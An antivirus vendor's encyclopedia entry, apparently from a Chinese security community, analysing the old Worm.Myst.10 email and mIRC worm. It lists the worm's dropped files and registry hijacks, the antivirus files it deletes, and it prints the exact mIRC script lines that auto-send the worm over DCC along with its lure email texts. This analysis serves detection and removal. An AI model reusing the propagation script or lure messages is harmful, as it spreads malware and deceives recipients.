爱毒霸社区
拒绝当“肉鸡” 保安获大奖!
顽固病毒解决方案大全
一点一滴学电脑应用技巧
毒霸2008教程——清理专家
欺骗是攻击者最热衷的手法
爱毒霸社区推荐安全工具下载
如何使用命令行查毒
远程清除机器狗病毒实战
清理专家在手,菜鸟杀毒不愁
如何判断进程或程序是否安全
windows安全漏洞的解释索引
史上最强磁碟机病毒清除思路
金山ARP防火墙1.2版功能简介
Worm.Myst.10
病毒名称(中文):
我的最爱
病毒别名:
Email-Worm.Win32.generic[AVP],I-Worm/Myst.10[KV],W
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
80384
影响系统:
Win9x WinNT
病毒行为:
这是一个用VB编写的蠕虫病毒,该病毒通过电子邮件和mIRC聊天系统进行传播。该病毒会修改.exe的文件关联到病毒,使得每次运行exe文件的时候该病毒都会被执行;该病毒会删除三款杀毒软件的某些数据使得这些杀毒软件无法正常运行。该病毒除了通过在Outlook地址薄里面收集邮件地址,将病毒做为附件发送出去之外,它还会通过向mIRC的脚本配置文件中写入一些脚本,使得该病毒能够通过mIRC聊天系统传播。
1)病毒将自己拷贝到:
C:\windows\system\systray_.exe
C:\windows\system\runtray_.dll
2)释放临时文件C:\ModReg.reg,并通过regedit /s C:\ModReg.reg命令写入注册表
修改exe的文件关联到病毒,使得每次运行exe文件的时候该病毒都会被执行
HKEY_CLASSES_ROOT\exefile\shell\open\command
(Default)=""C:\windows\system\systray_.exe" %1 %*"
HKEY_LOCAL_MACHINE\Software\McAfee\Scan95
"SerialNum"="MYST v1.0 by MYSTiQUE"
"CurrentVersionNumber"="666"
"DAT"="NONE"
"DATFile"="-2000"
"VirusInfoURL"="http://ma***.sexchat.***"
"bVShieldEnabled"=0x0
为病毒添加启动项:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"SystemTray"="C:\Windows\system\systray_.exe"
3)向mIRC的脚本配置文件C:\mirc\script.ini中写入以下内容,使得该病毒能够通过mIRC聊天系统传播
[script]
n0= on 1:TEXT:*sex*:#:{
n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy.So I"m going to send you one.
n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe
n3= .dcc send $nick C:\windows\system\install_show.exe
n4= }
4)删除三款杀毒软件的以下文件:
C:\Program Files\Norton AntiVirus\*.dat
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\*.*
C:\Program Files\Common Files\KAV Shared Files\*.*
5)在Outlook里面收集邮件地址,并将病毒做为附件发送给这些邮件接收者
取下面的某一行做为邮件主题:
Here is the e-mail attachment I told you about earlier, It"s an installation program for an adult screensaver slideshow program
Here is the e-mail attachment I told you about earlier, It"s an installation program for an Outlook Service Release upgrade
Here is the e-mail attachment I told you about earlier, It"s an installation program for a Microsoft Explorer Patch
Here is the e-mail attachment I told you about earlier, It"s an installation program for a Desktop Game I got off the internet
Here is the e-mail attachment I told you about earlier, It"s an installation program for a brand-new MP3 player and plug-ins
Here is the e-mail attachment I told you about earlier, It"s an installation program for an Microsoft Internet Explorer Service Pack (Q401243)
Here is the e-mail attachment I told you about earlier, It"s an installation program for an Kaspersky Anti-Virus 4.0 bugfix
邮件正文:
Hey, sorry I haven"t written to you in a while. Well you could call it a while. I"m writing this E-mail to let you know of an attachment im sending with the next mail.
Here it is
邮件附件:C:\windows\install_.exe